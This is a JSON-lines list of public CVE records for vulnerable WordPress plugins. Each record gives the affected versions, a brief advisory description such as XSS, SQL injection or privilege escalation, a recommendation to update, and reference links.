{"CVE_ID":"CVE-2024-3134","slug":"master-addons","versionImpact":"2.0.6.0","versionEndExcluding":"2.0.6.1","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the title_html_tag attribute in all versions up to, and including, 2.0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6106c972-5475-4c19-8630-3a01edc616ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6106c972-5475-4c19-8630-3a01edc616ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3087193%40master-addons%2Ftrunk&old=3078134%40master-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3087193%40master-addons%2Ftrunk&old=3078134%40master-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13806","slug":"authors-list","versionImpact":"2.0.6","versionEndExcluding":"2.0.6.1","description":"The The Authors List plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.6. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 2.0.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3246757%40authors-list&new=3246757%40authors-list&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3246757%40authors-list&new=3246757%40authors-list&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbfa20ad-6411-4054-9973-cb12d17c57f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbfa20ad-6411-4054-9973-cb12d17c57f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4265","slug":"master-addons","versionImpact":"2.0.5.9","versionEndExcluding":"2.0.6.0","description":"The Master Addons \u2013 Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in versions up to, and including, 2.0.5.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9a48769-94d9-459f-b34b-fdfe4c10b36c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9a48769-94d9-459f-b34b-fdfe4c10b36c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-logo-slider\\\/ma-logo-slider.php#L825\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-logo-slider\\\/ma-logo-slider.php#L825\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-carousel\\\/ma-image-carousel.php#L915\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-image-carousel\\\/ma-image-carousel.php#L915\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078134\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078134\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5969","slug":"aiomatic-automatic-ai-content-writer","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The AIomatic - Automatic AI Content Writer for WordPress is vulnerable to arbitrary email sending vulnerability in versions up to, and including, 2.0.5. This is due to insufficient limitations on the email recipient and the content in the 'aiomatic_send_email' function which are reachable via AJAX. This makes it possible for unauthenticated attackers to send emails with any content to any recipient.","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5be40f-89da-4b97-9a85-527602d84c4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5be40f-89da-4b97-9a85-527602d84c4d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/aiomatic-automatic-ai-content-writer\\\/38877369?srsltid=AfmBOornCSKshlaSyZi2nonTcpSskMpBNJpdAS_No91A5V5lTIAD1h8S\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/aiomatic-automatic-ai-content-writer\\\/38877369?srsltid=AfmBOornCSKshlaSyZi2nonTcpSskMpBNJpdAS_No91A5V5lTIAD1h8S\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4490","slug":"wp-job-portal","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The WP Job Portal WordPress plugin through 2.0.3 does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/986024f0-3c8d-44d8-a9c9-1dd284d7db0d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/986024f0-3c8d-44d8-a9c9-1dd284d7db0d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13380","slug":"alex-reservations","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The Alex Reservations: Smart Restaurant Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rr_form' shortcode in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alex-reservations\\\/trunk\\\/includes\\\/shortcodes.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/alex-reservations\\\/trunk\\\/includes\\\/shortcodes.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229743\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229743\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89ddede9-3170-48bb-aae5-14f915330f67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89ddede9-3170-48bb-aae5-14f915330f67?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9927","slug":"wooCommerce-order-proposal","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The WooCommerce Order Proposal plugin for WordPress is vulnerable to privilege escalation via order proposal in all versions up to and including 2.0.5. This is due to the improper implementation of allow_payment_without_login function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to log in to WordPress as an arbitrary user account, including administrators.","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdc993a4-6f65-4570-811c-13a80dbec064?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdc993a4-6f65-4570-811c-13a80dbec064?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpovernight.com\\\/downloads\\\/woocommerce-order-proposal\\\/\",\"name\":\"https:\\\/\\\/wpovernight.com\\\/downloads\\\/woocommerce-order-proposal\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5646","slug":"futurio-extra","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The Futurio Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018header_size\u2019 attribute within the Advanced Text Block widget in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbb3bd9b-ac1f-4488-931f-2ba37576df2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbb3bd9b-ac1f-4488-931f-2ba37576df2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/futurio-extra\\\/tags\\\/2.0.5\\\/inc\\\/elementor\\\/widgets\\\/advanced-text-block.php#L265\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/futurio-extra\\\/tags\\\/2.0.5\\\/inc\\\/elementor\\\/widgets\\\/advanced-text-block.php#L265\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100491\\\/#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100491\\\/#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5325","slug":"woo-vietnam-checkout","versionImpact":"2.0.5","versionEndExcluding":"2.0.6","description":"The Woocommerce Vietnam Checkout WordPress plugin before 2.0.6 does not escape the custom shipping phone field no the checkout form leading to XSS","recommendation":"Update to version 2.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e93841ef-e113-41d3-9fa1-b21af85bd812\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e93841ef-e113-41d3-9fa1-b21af85bd812\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10937","slug":"related-post","versionImpact":"2.0.58","versionEndExcluding":"2.0.59","description":"The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.58 via the wp_ajax_nopriv_related_post_ajax_get_post_ids AJAX action. This makes it possible for unauthenticated attackers to extract sensitive data including titles of posts in draft status.","recommendation":"Update to version 2.0.59, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3199720%40related-post%2Ftrunk&old=3126666%40related-post%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3199720%40related-post%2Ftrunk&old=3126666%40related-post%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85f7c69d-0b48-47af-9451-3cfd4326ffe5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85f7c69d-0b48-47af-9451-3cfd4326ffe5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25214","slug":"wpshopify","versionImpact":"2.0.4","versionEndExcluding":"2.0.5","description":"The ShopWP plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several REST API routes in versions up to, and including, 2.0.4. This makes it possible for unauthenticated attackers to call the endpoints and perform unauthorized actions such as updating the plugin's settings and injecting malicious scripts.","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d04f11b4-ee58-428b-aaa2-dc7d9f3e68e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d04f11b4-ee58-428b-aaa2-dc7d9f3e68e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2132502%40wpshopify&new=2132502%40wpshopify&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2132502%40wpshopify&new=2132502%40wpshopify&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4836","slug":"user-private-files","versionEndExcluding":"2.0.5","description":"The WordPress File Sharing Plugin WordPress plugin before 2.0.5 does not check authorization before displaying files and folders, allowing users to gain access to those filed by manipulating IDs which can easily be brute forced","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-4836-user-private-files-idor-to-sensitive-data-and-private-files-exposure-leak-of-info-poc\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-4836-user-private-files-idor-to-sensitive-data-and-private-files-exposure-leak-of-info-poc\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c17f2534-d791-4fe3-b45b-875777585dc6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c17f2534-d791-4fe3-b45b-875777585dc6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22735","slug":"tag-groups","versionImpact":"2.0.4","versionEndExcluding":"2.0.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TaxoPress WordPress Tag Cloud Plugin \u2013 Tag Groups allows Reflected XSS. This issue affects WordPress Tag Cloud Plugin \u2013 Tag Groups: from n\/a through 2.0.4.","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/tag-groups\\\/vulnerability\\\/wordpress-tag-cloud-plugin-tag-groups-plugin-2-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/tag-groups\\\/vulnerability\\\/wordpress-tag-cloud-plugin-tag-groups-plugin-2-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6963","slug":"getwid","versionImpact":"2.0.4","versionEndExcluding":"2.0.5","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to CAPTCHA Bypass in versions up to, and including, 2.0.4. This makes it possible for unauthenticated attackers to bypass the Captcha Verification of the Contact Form block by omitting 'g-recaptcha-response' from the 'data' array.","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d317f2c7-06f3-4875-9f9b-eb7f450aa2f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d317f2c7-06f3-4875-9f9b-eb7f450aa2f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022982\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022982\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6959","slug":"getwid","versionImpact":"2.0.4","versionEndExcluding":"2.0.5","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the recaptcha_api_key_manage function in all versions up to, and including, 2.0.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete the 'Recaptcha Site Key' and 'Recaptcha Secret Key' settings.","recommendation":"Update to version 2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/774c00fb-82cd-44ca-bf96-3f6dfd1977d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/774c00fb-82cd-44ca-bf96-3f6dfd1977d0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022982\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022982\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4487","slug":"blocksy-companion","versionImpact":"2.0.45","versionEndExcluding":"2.0.46","description":"The Blocksy Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG uploads in versions up to, and including, 2.0.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.46, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084198\\\/#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084198\\\/#file18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blocksy-companion\\\/tags\\\/2.0.45\\\/framework\\\/features\\\/svg.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blocksy-companion\\\/tags\\\/2.0.45\\\/framework\\\/features\\\/svg.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5208529c-4ac3-42a4-82d0-7f4d2e486236?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5208529c-4ac3-42a4-82d0-7f4d2e486236?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43237","slug":"tag-groups","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in TaxoPress WordPress Tag Cloud Plugin \u2013 Tag Groups.This issue affects WordPress Tag Cloud Plugin \u2013 Tag Groups: from n\/a through 2.0.3.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/tag-groups\\\/wordpress-tag-groups-plugin-2-0-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/tag-groups\\\/wordpress-tag-groups-plugin-2-0-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6786","slug":"payment-gateway-for-telcell","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Payment Gateway for Telcell WordPress plugin through 2.0.1 does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3e64947-3138-4ec4-86c4-27b5d6a5c9c2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3e64947-3138-4ec4-86c4-27b5d6a5c9c2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3836","slug":"seed-social","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Seed Social WordPress plugin before 2.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64e144fb-aa9f-4cfe-9c44-a4e1fa2e8dd5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64e144fb-aa9f-4cfe-9c44-a4e1fa2e8dd5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8499","slug":"woo-checkout-field-editor-pro","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Checkout Field Editor (Checkout Manager) for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018render_review_request_notice\u2019 function in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81eb8963-548f-4e94-83bd-266a19c09aab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81eb8963-548f-4e94-83bd-266a19c09aab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-checkout-field-editor-pro\\\/trunk\\\/admin\\\/class-thwcfd-admin.php#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-checkout-field-editor-pro\\\/trunk\\\/admin\\\/class-thwcfd-admin.php#L426\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160299\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160299\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4603","slug":"star-cloudprnt-for-woocommerce","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Star CloudPRNT for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'printersettings'  parameter in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/110c6d41-e814-41c9-a3e7-d94ec3d953e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/110c6d41-e814-41c9-a3e7-d94ec3d953e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1cRVH7Oz6M2U2XTbNAmm43PDKBw6FzShA\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1cRVH7Oz6M2U2XTbNAmm43PDKBw6FzShA\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2991002\\\/star-cloudprnt-for-woocommerce\\\/trunk?contextall=1&old=2510015&old_path=%2Fstar-cloudprnt-for-woocommerce%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2991002\\\/star-cloudprnt-for-woocommerce\\\/trunk?contextall=1&old=2510015&old_path=%2Fstar-cloudprnt-for-woocommerce%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4512","slug":"better-font-awesome","versionEndExcluding":"2.0.4","description":"The Better Font Awesome WordPress plugin before 2.0.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7957f355-c767-4f59-bb28-0302d33386a6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7957f355-c767-4f59-bb28-0302d33386a6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12501","slug":"simple-locator","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The Simple Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-locator\\\/tags\\\/2.0.3\\\/app\\\/API\\\/AllLocationsShortcode.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-locator\\\/tags\\\/2.0.3\\\/app\\\/API\\\/AllLocationsShortcode.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-locator\\\/tags\\\/2.0.3\\\/app\\\/API\\\/FormShortcode.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-locator\\\/tags\\\/2.0.3\\\/app\\\/API\\\/FormShortcode.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207747%40simple-locator&new=3207747%40simple-locator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207747%40simple-locator&new=3207747%40simple-locator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38cb5e43-56d0-40b6-936a-f10f15d2e72f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38cb5e43-56d0-40b6-936a-f10f15d2e72f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5200","slug":"flowpaper-lite-pdf-flipbook","versionImpact":"2.0.3","versionEndExcluding":"2.0.4","description":"The flowpaper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'flipbook' shortcode in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31d6288d-87f0-4822-b3f4-541f70cf99fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31d6288d-87f0-4822-b3f4-541f70cf99fd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966821\\\/flowpaper-lite-pdf-flipbook\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966821\\\/flowpaper-lite-pdf-flipbook\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flowpaper-lite-pdf-flipbook\\\/trunk\\\/flowpaper.php?rev=2959754#L395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flowpaper-lite-pdf-flipbook\\\/trunk\\\/flowpaper.php?rev=2959754#L395\",\"refsource\":\"MISC\",\"tags\":[]}]"}
